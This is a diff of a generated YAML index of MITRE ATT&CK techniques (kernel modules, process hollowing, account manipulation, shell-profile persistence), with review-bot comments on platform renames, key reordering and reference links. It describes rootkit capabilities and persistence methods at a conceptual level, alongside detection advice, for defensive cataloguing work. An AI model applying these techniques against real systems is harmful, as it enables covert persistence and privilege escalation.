- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -20828,12 +21146,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -20869,16 +21186,15 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
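Review bot: Replacing `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` changes the platform strings this technique is keyed on, so any per-platform index that still selects on the old names will silently stop matching T1098; make sure those indexes are regenerated in the same change. The `2.6` to `2.7` bump for a platform-only change is consistent with how the other objects in this diff are versioned. Cosmetic: the first atomic test under this technique is still named `Azure AD - adding user to Azure AD role`; fine to leave, but the name now refers to a platform label that no longer exists in the object.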
@@ -20919,7 +21235,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests:
- name: Azure AD - adding user to Azure AD role
@@ -21158,138 +21473,137 @@ privilege-escalation:
elevation_required: false
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
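Review bot: This 138-line hunk is almost entirely a key reorder of the T1547.006 object (description, detection, kill chain phases, data sources and every `url:` line moved, not changed); the actual deltas are the `modified` date (`2022-05-11` to `2024-09-12`), `x_mitre_attack_spec_version` `2.1.0` to `3.2.0`, the iDefense reference switching to `https://` with a new retrieval date, `created_by_ref`/`revoked` moving, and `spec_version` being dropped. Emitting keys in a fixed order (or sorting `external_references` fields consistently, `description` before `url`, as this export now does) would make future diffs reviewable. Two typos in the moved text, "run as apart of the kernel" and "LMK Linux rootkit" in the Reptile and Diamorphine entries, are upstream ATT&CK wording and should not be hand-edited in a generated file.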
@@ -21326,7 +21640,7 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -21352,12 +21666,10 @@ privilege-escalation:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
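Review bot: `- x_mitre_attack_spec_version: 2.1.0` is removed from T1574.013 (KernelCallbackTable) but, unlike every other object in this diff, nothing adds it back as `3.2.0`: the only other hunk touching this object is the `modified` date change above, and there is no unchanged region large enough to hide a second copy without it being a duplicate key. Check whether the field was dropped unintentionally; if the upstream object really has no `x_mitre_attack_spec_version`, a note in the commit message would save the next reader the same check.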
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -21435,9 +21747,8 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1574:
@@ -21504,7 +21815,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -21578,11 +21888,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -21599,7 +21908,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -21609,7 +21917,7 @@ privilege-escalation:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -21618,19 +21926,17 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
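Review bot: the platform rename for T1078 (`Azure AD`, `Office 365`, `Google Workspace` replaced by `Office Suite`, `Identity Provider`, version 2.6 to 2.7) changes the strings that any downstream filtering on `x_mitre_platforms` keys on; a consumer selecting tests by the old platform names will now match nothing for this technique. The same rename recurs for T1546 and T1098.002 further down, so this deserves a line in the PR description as a breaking change rather than being left implicit in a version bump.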
@@ -21678,11 +21984,12 @@ privilege-escalation:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -21750,23 +22057,22 @@ privilege-escalation:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
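Review bot: the `Leitch Hollowing` reference is repointed from `http://www.autosectools.com/process-hollowing.pdf` to a third-party mirror at `https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf`, whereas the `bencane blog bashrc` reference later in this diff is repointed to a `web.archive.org` snapshot of the original URL. Prefer one approach for dead links; an archive snapshot preserves the original location and is verifiable, while a mirror needs someone to confirm it hosts the same document.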
T1068:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-04-07T17:13:54.168Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -21829,11 +22135,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -21886,8 +22191,8 @@ privilege-escalation:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -21935,78 +22240,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
